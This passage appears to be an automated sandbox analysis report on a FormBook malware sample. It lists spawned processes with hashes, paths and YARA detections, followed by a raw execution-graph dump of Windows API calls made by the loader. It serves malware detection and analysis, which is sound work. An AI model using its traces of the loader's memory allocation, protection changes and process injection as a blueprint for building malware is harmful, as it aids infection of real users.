                                                                                    File size:872'244 bytes
                                                                                    MD5 hash:629BE165860D2336755DE85467756639
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:14:32:59
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe"
                                                                                    Imagebase:0x6e0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:14:33:02
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Windows\SysWOW64\xwizard.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                                                    Imagebase:0x370000
                                                                                    File size:55'808 bytes
                                                                                    MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:14:33:14
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe"
                                                                                    Imagebase:0x6e0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:14:33:26
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:0x7ff6bf500000
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true


                                                                                      Execution Graph

                                                                                      Execution Coverage:23.1%
                                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                                      Signature Coverage:18.2%
                                                                                      Total number of Nodes:1503
                                                                                      Total number of Limit Nodes:46
4439 40372e 4438->4439 4440 403734 4439->4440 4441 403746 4439->4441 4535 405c8d wsprintfW 4440->4535 4442 405c13 3 API calls 4441->4442 4443 403776 4442->4443 4445 403795 lstrcatW 4443->4445 4446 405c13 3 API calls 4443->4446 4447 403744 4445->4447 4446->4445 4526 4039f0 4447->4526 4450 4058b6 18 API calls 4451 4037c7 4450->4451 4452 40385b 4451->4452 4454 405c13 3 API calls 4451->4454 4453 4058b6 18 API calls 4452->4453 4455 403861 4453->4455 4456 4037f9 4454->4456 4457 403871 LoadImageW 4455->4457 4458 405d68 18 API calls 4455->4458 4456->4452 4463 40381a lstrlenW 4456->4463 4467 4057db CharNextW 4456->4467 4459 403917 4457->4459 4460 403898 RegisterClassW 4457->4460 4458->4457 4462 40140b 2 API calls 4459->4462 4461 4038ce SystemParametersInfoW CreateWindowExW 4460->4461 4489 403921 4460->4489 4461->4459 4466 40391d 4462->4466 4464 403828 lstrcmpiW 4463->4464 4465 40384e 4463->4465 4464->4465 4468 403838 GetFileAttributesW 4464->4468 4469 4057ae 3 API calls 4465->4469 4472 4039f0 19 API calls 4466->4472 4466->4489 4470 403817 4467->4470 4471 403844 4468->4471 4473 403854 4469->4473 4470->4463 4471->4465 4474 4057fa 2 API calls 4471->4474 4475 40392e 4472->4475 4536 405d46 lstrcpynW 4473->4536 4474->4465 4477 40393a ShowWindow LoadLibraryW 4475->4477 4478 4039bd 4475->4478 4480 403960 GetClassInfoW 4477->4480 4481 403959 LoadLibraryW 4477->4481 4479 4050cd 5 API calls 4478->4479 4482 4039c3 4479->4482 4483 403974 GetClassInfoW RegisterClassW 4480->4483 4484 40398a DialogBoxParamW 4480->4484 4481->4480 4485 4039c7 4482->4485 4486 4039df 4482->4486 4483->4484 4487 40140b 2 API calls 4484->4487 4485->4489 4490 40140b 2 API calls 4485->4490 4488 40140b 2 API calls 4486->4488 4487->4489 4488->4489 4489->4394 4490->4489 4491->4337 4492->4379 4493->4383 4495 403658 4494->4495 4496 40364a CloseHandle 4494->4496 4538 403685 4495->4538 4496->4495 4499 4055d5 71 API calls 4500 40349f OleUninitialize 4499->4500 4500->4358 4500->4359 4501->4370 4502->4395 4504 401389 2 API 
calls 4503->4504 4505 401420 4504->4505 4505->4360 4507 405a0b GetTickCount GetTempFileNameW 4506->4507 4508 405a41 4507->4508 4509 4031db 4507->4509 4508->4507 4508->4509 4509->4339 4510->4411 4511->4413 4512->4417 4514 402ca4 4513->4514 4515 402cbc 4513->4515 4516 402cb4 4514->4516 4517 402cad DestroyWindow 4514->4517 4518 402cc4 4515->4518 4519 402ccc GetTickCount 4515->4519 4516->4420 4517->4516 4520 4060e9 2 API calls 4518->4520 4521 402cda CreateDialogParamW ShowWindow 4519->4521 4522 402cfd 4519->4522 4523 402cca 4520->4523 4521->4522 4522->4420 4523->4420 4524->4428 4525->4426 4527 403a04 4526->4527 4537 405c8d wsprintfW 4527->4537 4529 403a75 4530 405d68 18 API calls 4529->4530 4531 403a81 SetWindowTextW 4530->4531 4532 4037a5 4531->4532 4533 403a9d 4531->4533 4532->4450 4533->4532 4534 405d68 18 API calls 4533->4534 4534->4533 4535->4447 4536->4452 4537->4529 4539 403693 4538->4539 4540 40365d 4539->4540 4541 403698 FreeLibrary GlobalFree 4539->4541 4540->4499 4541->4540 4541->4541 4803 40165e 4804 402ad0 18 API calls 4803->4804 4805 401665 4804->4805 4806 402ad0 18 API calls 4805->4806 4807 40166e 4806->4807 4808 402ad0 18 API calls 4807->4808 4809 401677 MoveFileW 4808->4809 4810 401683 4809->4810 4811 40168a 4809->4811 4813 401423 25 API calls 4810->4813 4812 406089 2 API calls 4811->4812 4815 402195 4811->4815 4814 401699 4812->4814 4813->4815 4814->4815 4816 405be0 40 API calls 4814->4816 4816->4810 4817 4023de 4818 402bda 19 API calls 4817->4818 4819 4023e8 4818->4819 4820 402ad0 18 API calls 4819->4820 4821 4023f1 4820->4821 4822 4023fc RegQueryValueExW 4821->4822 4826 402729 4821->4826 4823 402422 RegCloseKey 4822->4823 4824 40241c 4822->4824 4823->4826 4824->4823 4828 405c8d wsprintfW 4824->4828 4828->4823 4829 4040e3 lstrlenW 4830 404102 4829->4830 4831 404104 WideCharToMultiByte 4829->4831 4830->4831 4832 401ce5 GetDlgItem GetClientRect 4833 402ad0 18 API calls 4832->4833 4834 401d17 LoadImageW SendMessageW 4833->4834 4835 401d35 DeleteObject 
4834->4835 4836 40295d 4834->4836 4835->4836 4837 4043e9 4838 4043f9 4837->4838 4839 40441f 4837->4839 4840 403f95 19 API calls 4838->4840 4841 403ffc 8 API calls 4839->4841 4842 404406 SetDlgItemTextW 4840->4842 4843 40442b 4841->4843 4842->4839 3819 40206a 3820 402ad0 18 API calls 3819->3820 3821 402071 3820->3821 3822 402ad0 18 API calls 3821->3822 3823 40207b 3822->3823 3824 402ad0 18 API calls 3823->3824 3825 402084 3824->3825 3826 402ad0 18 API calls 3825->3826 3827 40208e 3826->3827 3828 402ad0 18 API calls 3827->3828 3829 402098 3828->3829 3830 4020ac CoCreateInstance 3829->3830 3832 402ad0 18 API calls 3829->3832 3831 4020cb 3830->3831 3834 402195 3831->3834 3835 401423 3831->3835 3832->3830 3836 404ffa 25 API calls 3835->3836 3837 401431 3836->3837 3837->3834 4844 40156b 4845 401584 4844->4845 4846 40157b ShowWindow 4844->4846 4847 401592 ShowWindow 4845->4847 4848 40295d 4845->4848 4846->4845 4847->4848 4849 4024ec 4850 4024f1 4849->4850 4851 40250a 4849->4851 4852 402ab3 18 API calls 4850->4852 4853 402510 4851->4853 4854 40253c 4851->4854 4859 4024f8 4852->4859 4855 402ad0 18 API calls 4853->4855 4856 402ad0 18 API calls 4854->4856 4857 402517 WideCharToMultiByte lstrlenA 4855->4857 4858 402543 lstrlenW 4856->4858 4857->4859 4858->4859 4860 402565 WriteFile 4859->4860 4861 402729 4859->4861 4860->4861 4862 404f6e 4863 404f92 4862->4863 4864 404f7e 4862->4864 4866 404f9a IsWindowVisible 4863->4866 4869 404fb1 4863->4869 4865 404f84 4864->4865 4874 404fdb 4864->4874 4867 403fe1 SendMessageW 4865->4867 4868 404fa7 4866->4868 4866->4874 4871 404f8e 4867->4871 4875 4048c4 SendMessageW 4868->4875 4870 404fe0 CallWindowProcW 4869->4870 4880 404944 4869->4880 4870->4871 4874->4870 4876 404923 SendMessageW 4875->4876 4877 4048e7 GetMessagePos ScreenToClient SendMessageW 4875->4877 4879 40491b 4876->4879 4878 404920 4877->4878 4877->4879 4878->4876 4879->4869 4889 405d46 lstrcpynW 4880->4889 4882 404957 4890 405c8d wsprintfW 4882->4890 4884 404961 4885 40140b 2 
API calls 4884->4885 4886 40496a 4885->4886 4891 405d46 lstrcpynW 4886->4891 4888 404971 4888->4874 4889->4882 4890->4884 4891->4888 4892 4018ef 4893 401926 4892->4893 4894 402ad0 18 API calls 4893->4894 4895 40192b 4894->4895 4896 4055d5 71 API calls 4895->4896 4897 401934 4896->4897 3924 402571 3925 402ab3 18 API calls 3924->3925 3931 40257a 3925->3931 3926 402642 3927 4025c1 ReadFile 3927->3926 3927->3931 3928 4025fe ReadFile 3928->3926 3929 40260d 3928->3929 3929->3926 3929->3931 3930 4025de MultiByteToWideChar 3930->3931 3931->3926 3931->3927 3931->3928 3931->3930 3932 402644 3931->3932 3934 402655 3931->3934 3936 405c8d wsprintfW 3932->3936 3934->3926 3935 402671 SetFilePointer 3934->3935 3935->3926 3936->3926 4898 4014f1 SetForegroundWindow 4899 40295d 4898->4899 4900 4018f2 4901 402ad0 18 API calls 4900->4901 4902 4018f9 4901->4902 4903 405529 MessageBoxIndirectW 4902->4903 4904 401902 4903->4904 4905 401df3 4906 402ad0 18 API calls 4905->4906 4907 401df9 4906->4907 4908 402ad0 18 API calls 4907->4908 4909 401e02 4908->4909 4910 402ad0 18 API calls 4909->4910 4911 401e0b 4910->4911 4912 402ad0 18 API calls 4911->4912 4913 401e14 4912->4913 4914 401423 25 API calls 4913->4914 4915 401e1b ShellExecuteW 4914->4915 4916 401e4c 4915->4916 4922 404976 GetDlgItem GetDlgItem 4923 4049c8 7 API calls 4922->4923 4930 404be1 4922->4930 4924 404a6b DeleteObject 4923->4924 4925 404a5e SendMessageW 4923->4925 4926 404a74 4924->4926 4925->4924 4928 404aab 4926->4928 4929 405d68 18 API calls 4926->4929 4927 404cc5 4932 404d71 4927->4932 4942 404d1e SendMessageW 4927->4942 4964 404bd4 4927->4964 4931 403f95 19 API calls 4928->4931 4933 404a8d SendMessageW SendMessageW 4929->4933 4930->4927 4940 4048c4 5 API calls 4930->4940 4965 404c52 4930->4965 4936 404abf 4931->4936 4934 404d83 4932->4934 4935 404d7b SendMessageW 4932->4935 4933->4926 4939 404dac 4934->4939 4944 404d95 ImageList_Destroy 4934->4944 4945 404d9c 4934->4945 4935->4934 4941 403f95 19 API calls 4936->4941 4937 
403ffc 8 API calls 4943 404f67 4937->4943 4938 404cb7 SendMessageW 4938->4927 4947 404f1b 4939->4947 4963 404944 4 API calls 4939->4963 4969 404de7 4939->4969 4940->4965 4946 404acd 4941->4946 4948 404d33 SendMessageW 4942->4948 4942->4964 4944->4945 4945->4939 4949 404da5 GlobalFree 4945->4949 4950 404ba2 GetWindowLongW SetWindowLongW 4946->4950 4957 404b9c 4946->4957 4960 404b1d SendMessageW 4946->4960 4961 404b59 SendMessageW 4946->4961 4962 404b6a SendMessageW 4946->4962 4952 404f2d ShowWindow GetDlgItem ShowWindow 4947->4952 4947->4964 4951 404d46 4948->4951 4949->4939 4953 404bbb 4950->4953 4956 404d57 SendMessageW 4951->4956 4952->4964 4954 404bc1 ShowWindow 4953->4954 4955 404bd9 4953->4955 4973 403fca SendMessageW 4954->4973 4974 403fca SendMessageW 4955->4974 4956->4932 4957->4950 4957->4953 4960->4946 4961->4946 4962->4946 4963->4969 4964->4937 4965->4927 4965->4938 4966 404ef1 InvalidateRect 4966->4947 4967 404f07 4966->4967 4975 4047de 4967->4975 4968 404e15 SendMessageW 4972 404e2b 4968->4972 4969->4968 4969->4972 4971 404e9f SendMessageW SendMessageW 4971->4972 4972->4966 4972->4971 4973->4964 4974->4930 4976 4047fb 4975->4976 4977 405d68 18 API calls 4976->4977 4978 404830 4977->4978 4979 405d68 18 API calls 4978->4979 4980 40483b 4979->4980 4981 405d68 18 API calls 4980->4981 4982 40486c lstrlenW wsprintfW SetDlgItemTextW 4981->4982 4982->4947 4983 404778 4984 4047a4 4983->4984 4985 404788 4983->4985 4987 4047d7 4984->4987 4988 4047aa SHGetPathFromIDListW 4984->4988 4994 40550d GetDlgItemTextW 4985->4994 4990 4047c1 SendMessageW 4988->4990 4991 4047ba 4988->4991 4989 404795 SendMessageW 4989->4984 4990->4987 4993 40140b 2 API calls 4991->4993 4993->4990 4994->4989 4220 10002739 4221 10002789 4220->4221 4222 10002749 VirtualProtect 4220->4222 4222->4221 4995 1000103d 4996 1000101b 8 API calls 4995->4996 4997 10001056 4996->4997 4998 4014ff 4999 401507 4998->4999 5001 40151a 4998->5001 5000 402ab3 18 API calls 4999->5000 5000->5001 5002 401000 5003 
401037 BeginPaint GetClientRect 5002->5003 5004 40100c DefWindowProcW 5002->5004 5006 4010f3 5003->5006 5007 401179 5004->5007 5008 401073 CreateBrushIndirect FillRect DeleteObject 5006->5008 5009 4010fc 5006->5009 5008->5006 5010 401102 CreateFontIndirectW 5009->5010 5011 401167 EndPaint 5009->5011 5010->5011 5012 401112 6 API calls 5010->5012 5011->5007 5012->5011 5013 401a00 5014 402ad0 18 API calls 5013->5014 5015 401a09 ExpandEnvironmentStringsW 5014->5015 5016 401a1d 5015->5016 5018 401a30 5015->5018 5017 401a22 lstrcmpW 5016->5017 5016->5018 5017->5018 5019 401b01 5020 402ad0 18 API calls 5019->5020 5021 401b08 5020->5021 5022 402ab3 18 API calls 5021->5022 5023 401b11 wsprintfW 5022->5023 5024 40295d 5023->5024 5025 402706 5026 402ad0 18 API calls 5025->5026 5027 40270d FindFirstFileW 5026->5027 5028 402720 5027->5028 5029 402735 5027->5029 5031 40273e 5029->5031 5033 405c8d wsprintfW 5029->5033 5034 405d46 lstrcpynW 5031->5034 5033->5031 5034->5028 5035 401f08 5036 402ad0 18 API calls 5035->5036 5037 401f0f 5036->5037 5038 401f36 GlobalAlloc 5037->5038 5039 401f8c 5037->5039 5038->5039 5040 401f4a 5038->5040 5040->5039 5044 405c8d wsprintfW 5040->5044 5042 401f7e 5045 405c8d wsprintfW 5042->5045 5044->5042 5045->5039 5046 100018ca 5047 10001243 3 API calls 5046->5047 5048 100018f0 5047->5048 5049 10001243 3 API calls 5048->5049 5050 100018f8 5049->5050 5051 10001243 3 API calls 5050->5051 5054 1000193a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5050->5054 5052 1000191f 5051->5052 5053 10001928 GlobalFree 5052->5053 5053->5054 5055 10001280 2 API calls 5054->5055 5056 10001ab6 GlobalFree GlobalFree 5055->5056 5057 401c8e 5058 402ab3 18 API calls 5057->5058 5059 401c94 IsWindow 5058->5059 5060 4019f0 5059->5060 3879 40268f 3880 402696 3879->3880 3883 402908 3879->3883 3881 402ab3 18 API calls 3880->3881 3882 4026a1 3881->3882 3884 4026a8 SetFilePointer 3882->3884 3884->3883 3885 4026b8 3884->3885 3887 405c8d wsprintfW 3885->3887 3887->3883 5061 
401491 5062 404ffa 25 API calls 5061->5062 5063 401498 5062->5063 4016 402293 4017 402ad0 18 API calls 4016->4017 4018 4022a2 4017->4018 4019 402ad0 18 API calls 4018->4019 4020 4022ab 4019->4020 4021 402ad0 18 API calls 4020->4021 4022 4022b5 GetPrivateProfileStringW 4021->4022 5064 402c15 5065 402c40 5064->5065 5066 402c27 SetTimer 5064->5066 5067 402c95 5065->5067 5068 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5065->5068 5066->5065 5068->5067 5069 100016d7 5070 10001706 5069->5070 5071 10001b47 23 API calls 5070->5071 5072 1000170d 5071->5072 5073 10001720 5072->5073 5074 10001714 5072->5074 5075 10001747 5073->5075 5076 1000172a 5073->5076 5077 10001280 2 API calls 5074->5077 5079 10001771 5075->5079 5080 1000174d 5075->5080 5078 10001555 3 API calls 5076->5078 5081 1000171e 5077->5081 5083 1000172f 5078->5083 5082 10001555 3 API calls 5079->5082 5084 100015d5 3 API calls 5080->5084 5082->5081 5085 100015d5 3 API calls 5083->5085 5086 10001752 5084->5086 5087 10001735 5085->5087 5088 10001280 2 API calls 5086->5088 5089 10001280 2 API calls 5087->5089 5090 10001758 GlobalFree 5088->5090 5091 1000173b GlobalFree 5089->5091 5090->5081 5092 1000176c GlobalFree 5090->5092 5091->5081 5092->5081 4028 401f98 4029 40205c 4028->4029 4030 401faa 4028->4030 4033 401423 25 API calls 4029->4033 4031 402ad0 18 API calls 4030->4031 4032 401fb1 4031->4032 4034 402ad0 18 API calls 4032->4034 4038 402195 4033->4038 4035 401fba 4034->4035 4036 401fd0 LoadLibraryExW 4035->4036 4037 401fc2 GetModuleHandleW 4035->4037 4036->4029 4039 401fe1 4036->4039 4037->4036 4037->4039 4051 40611c WideCharToMultiByte 4039->4051 4042 401ff2 4044 402011 4042->4044 4045 401ffa 4042->4045 4043 40202b 4046 404ffa 25 API calls 4043->4046 4054 1000177a 4044->4054 4047 401423 25 API calls 4045->4047 4048 402002 4046->4048 4047->4048 4048->4038 4049 40204e FreeLibrary 4048->4049 4049->4038 4052 406146 GetProcAddress 4051->4052 4053 401fec 4051->4053 4052->4053 4053->4042 4053->4043 4055 
100017aa 4054->4055 4096 10001b47 4055->4096 4057 100017b1 4058 100018c7 4057->4058 4059 100017c2 4057->4059 4060 100017c9 4057->4060 4058->4048 4145 10002244 4059->4145 4127 1000228e 4060->4127 4065 100017ee 4066 1000182d 4065->4066 4067 1000180f 4065->4067 4072 10001833 4066->4072 4073 1000186f 4066->4073 4158 10002430 4067->4158 4068 100017f8 4068->4065 4155 10002acf 4068->4155 4069 100017df 4071 100017e5 4069->4071 4077 100017f0 4069->4077 4071->4065 4139 10002814 4071->4139 4079 100015d5 3 API calls 4072->4079 4075 10002430 11 API calls 4073->4075 4084 10001861 4075->4084 4149 100025b7 4077->4149 4082 10001849 4079->4082 4083 10002430 11 API calls 4082->4083 4083->4084 4087 100018b6 4084->4087 4182 100023f3 4084->4182 4086 100017f6 4086->4065 4087->4058 4089 100018c0 GlobalFree 4087->4089 4089->4058 4093 100018a2 4093->4087 4186 10001555 wsprintfW 4093->4186 4094 1000189b FreeLibrary 4094->4093 4189 1000121b GlobalAlloc 4096->4189 4098 10001b6b 4190 1000121b GlobalAlloc 4098->4190 4100 10001b76 4191 10001243 4100->4191 4102 10001d8a GlobalFree GlobalFree GlobalFree 4103 10001da7 4102->4103 4106 10001df1 4102->4106 4104 100020f9 4103->4104 4103->4106 4113 10001dbc 4103->4113 4104->4106 4107 1000211a GetModuleHandleW 4104->4107 4105 10001c31 GlobalAlloc 4117 10001b7e 4105->4117 4106->4057 4108 1000212b LoadLibraryW 4107->4108 4109 1000213c 4107->4109 4108->4106 4108->4109 4202 10001620 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4109->4202 4110 10001c80 lstrcpyW 4114 10001c8a lstrcpyW 4110->4114 4111 10001ca5 GlobalFree 4111->4117 4113->4106 4198 1000122c 4113->4198 4114->4117 4115 1000214e 4115->4106 4116 1000215f lstrlenW 4115->4116 4203 10001620 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4116->4203 4117->4102 4117->4105 4117->4110 4117->4111 4117->4114 4122 1000209b lstrcpyW 4117->4122 4123 10001f40 GlobalFree 4117->4123 4125 1000122c 2 API calls 4117->4125 4126 10001ce7 4117->4126 4201 
1000121b GlobalAlloc 4117->4201 4120 10002179 4120->4106 4122->4117 4123->4117 4125->4117 4126->4117 4196 100015b0 GlobalSize GlobalAlloc 4126->4196 4132 100022a6 4127->4132 4128 10001243 3 API calls 4128->4132 4130 100023bc GlobalFree 4131 100017cf 4130->4131 4130->4132 4131->4065 4131->4068 4131->4069 4132->4128 4132->4130 4133 10002378 GlobalAlloc WideCharToMultiByte 4132->4133 4134 1000122c GlobalAlloc lstrcpynW 4132->4134 4135 10002351 GlobalAlloc 4132->4135 4136 10002333 lstrlenW 4132->4136 4206 100012c8 4132->4206 4133->4130 4134->4132 4137 1000233e 4135->4137 4136->4130 4136->4137 4137->4130 4211 1000254b 4137->4211 4141 10002826 4139->4141 4140 100028cb VirtualAlloc 4142 100028e9 4140->4142 4141->4140 4143 100029e5 4142->4143 4144 100029da GetLastError 4142->4144 4143->4065 4144->4143 4146 10002254 4145->4146 4147 100017c8 4145->4147 4146->4147 4148 10002266 GlobalAlloc 4146->4148 4147->4060 4148->4146 4153 100025d3 4149->4153 4150 10002624 GlobalAlloc 4154 10002646 4150->4154 4151 10002637 4152 1000263c GlobalSize 4151->4152 4151->4154 4152->4154 4153->4150 4153->4151 4154->4086 4156 10002ada 4155->4156 4157 10002b1a GlobalFree 4156->4157 4164 10002450 4158->4164 4160 100024e3 lstrcpyW 4160->4164 4161 1000247e wsprintfW 4161->4164 4162 10002504 GlobalFree 4162->4164 4163 100024b1 MultiByteToWideChar 4163->4164 4164->4160 4164->4161 4164->4162 4164->4163 4165 1000252d GlobalFree 4164->4165 4167 100024a0 lstrcpynW 4164->4167 4168 1000248f StringFromGUID2 4164->4168 4169 10001280 2 API calls 4164->4169 4214 1000121b GlobalAlloc 4164->4214 4215 100012f3 4164->4215 4165->4164 4166 10001815 4165->4166 4171 100015d5 4166->4171 4167->4164 4168->4164 4169->4164 4219 1000121b GlobalAlloc 4171->4219 4173 100015db 4174 100015e8 lstrcpyW 4173->4174 4175 10001602 4173->4175 4177 1000161c 4174->4177 4175->4177 4178 10001607 wsprintfW 4175->4178 4179 10001280 4177->4179 4178->4177 4180 100012c3 GlobalFree 4179->4180 4181 10001289 GlobalAlloc lstrcpynW 4179->4181 
4180->4084 4181->4180 4183 10002401 4182->4183 4184 10001882 4182->4184 4183->4184 4185 1000241d GlobalFree 4183->4185 4184->4093 4184->4094 4185->4183 4187 10001280 2 API calls 4186->4187 4188 1000157f 4187->4188 4188->4087 4189->4098 4190->4100 4192 1000127c 4191->4192 4193 1000124d 4191->4193 4192->4117 4193->4192 4204 1000121b GlobalAlloc 4193->4204 4195 10001259 lstrcpyW GlobalFree 4195->4117 4197 100015ce 4196->4197 4197->4126 4205 1000121b GlobalAlloc 4198->4205 4200 1000123b lstrcpynW 4200->4106 4201->4117 4202->4115 4203->4120 4204->4195 4205->4200 4207 100012d0 4206->4207 4208 100012ee 4206->4208 4207->4208 4209 1000122c 2 API calls 4207->4209 4208->4208 4210 100012ec 4209->4210 4210->4132 4212 10002559 VirtualAlloc 4211->4212 4213 100025af 4211->4213 4212->4213 4213->4137 4214->4164 4216 10001324 4215->4216 4217 100012fc 4215->4217 4216->4164 4217->4216 4218 10001308 lstrcpyW 4217->4218 4218->4216 4219->4173 5093 10001058 5094 10001243 3 API calls 5093->5094 5096 10001074 5094->5096 5095 100010dd 5096->5095 5097 10001092 5096->5097 5098 1000152e 4 API calls 5096->5098 5099 1000152e 4 API calls 5097->5099 5098->5097 5100 100010a2 5099->5100 5101 100010b2 5100->5101 5102 100010a9 GlobalSize 5100->5102 5103 100010b6 GlobalAlloc 5101->5103 5104 100010c7 5101->5104 5102->5101 5105 10001555 3 API calls 5103->5105 5106 100010d2 GlobalFree 5104->5106 5105->5104 5106->5095 5107 401718 5108 402ad0 18 API calls 5107->5108 5109 40171f SearchPathW 5108->5109 5110 40173a 5109->5110 5111 40159b 5112 402ad0 18 API calls 5111->5112 5113 4015a2 SetFileAttributesW 5112->5113 5114 4015b4 5113->5114 4615 40219e 4616 402ad0 18 API calls 4615->4616 4617 4021a4 4616->4617 4618 402ad0 18 API calls 4617->4618 4619 4021ad 4618->4619 4620 402ad0 18 API calls 4619->4620 4621 4021b6 4620->4621 4622 406089 2 API calls 4621->4622 4623 4021bf 4622->4623 4624 4021d0 lstrlenW lstrlenW 4623->4624 4628 4021c3 4623->4628 4626 404ffa 25 API calls 4624->4626 4625 404ffa 25 API calls 4629 
4021cb 4625->4629 4627 40220e SHFileOperationW 4626->4627 4627->4628 4627->4629 4628->4625 4628->4629 5115 40149e 5116 40223c 5115->5116 5117 4014ac PostQuitMessage 5115->5117 5117->5116 5118 100010e1 5119 10001111 5118->5119 5120 10001243 3 API calls 5119->5120 5130 10001121 5120->5130 5121 100011d8 GlobalFree 5122 100012c8 2 API calls 5122->5130 5123 100011d3 5123->5121 5124 10001243 3 API calls 5124->5130 5125 10001280 2 API calls 5128 100011c4 GlobalFree 5125->5128 5126 10001164 GlobalAlloc 5126->5130 5127 100011f8 GlobalFree 5127->5130 5128->5130 5129 100012f3 lstrcpyW 5129->5130 5130->5121 5130->5122 5130->5123 5130->5124 5130->5125 5130->5126 5130->5127 5130->5128 5130->5129 3594 401b22 3595 401b73 3594->3595 3596 401b2f 3594->3596 3598 401b78 3595->3598 3599 401b9d GlobalAlloc 3595->3599 3597 401bb8 3596->3597 3602 401b46 3596->3602 3600 405d68 18 API calls 3597->3600 3608 40223c 3597->3608 3598->3608 3633 405d46 lstrcpynW 3598->3633 3613 405d68 3599->3613 3604 402236 3600->3604 3631 405d46 lstrcpynW 3602->3631 3634 405529 3604->3634 3606 401b8a GlobalFree 3606->3608 3609 401b55 3632 405d46 lstrcpynW 3609->3632 3611 401b64 3638 405d46 lstrcpynW 3611->3638 3626 405d75 3613->3626 3614 405fc0 3615 405fd6 3614->3615 3655 405d46 lstrcpynW 3614->3655 3615->3597 3617 405e28 GetVersion 3617->3626 3618 405f8e lstrlenW 3618->3626 3621 405d68 10 API calls 3621->3618 3622 405ea3 GetSystemDirectoryW 3622->3626 3624 405eb6 GetWindowsDirectoryW 3624->3626 3626->3614 3626->3617 3626->3618 3626->3621 3626->3622 3626->3624 3627 405eea SHGetSpecialFolderLocation 3626->3627 3628 405d68 10 API calls 3626->3628 3629 405f2f lstrcatW 3626->3629 3639 405c13 RegOpenKeyExW 3626->3639 3644 405fda 3626->3644 3653 405c8d wsprintfW 3626->3653 3654 405d46 lstrcpynW 3626->3654 3627->3626 3630 405f02 SHGetPathFromIDListW CoTaskMemFree 3627->3630 3628->3626 3629->3626 3630->3626 3631->3609 3632->3611 3633->3606 3637 40553e 3634->3637 3635 40558a 3635->3608 3636 405552 MessageBoxIndirectW 
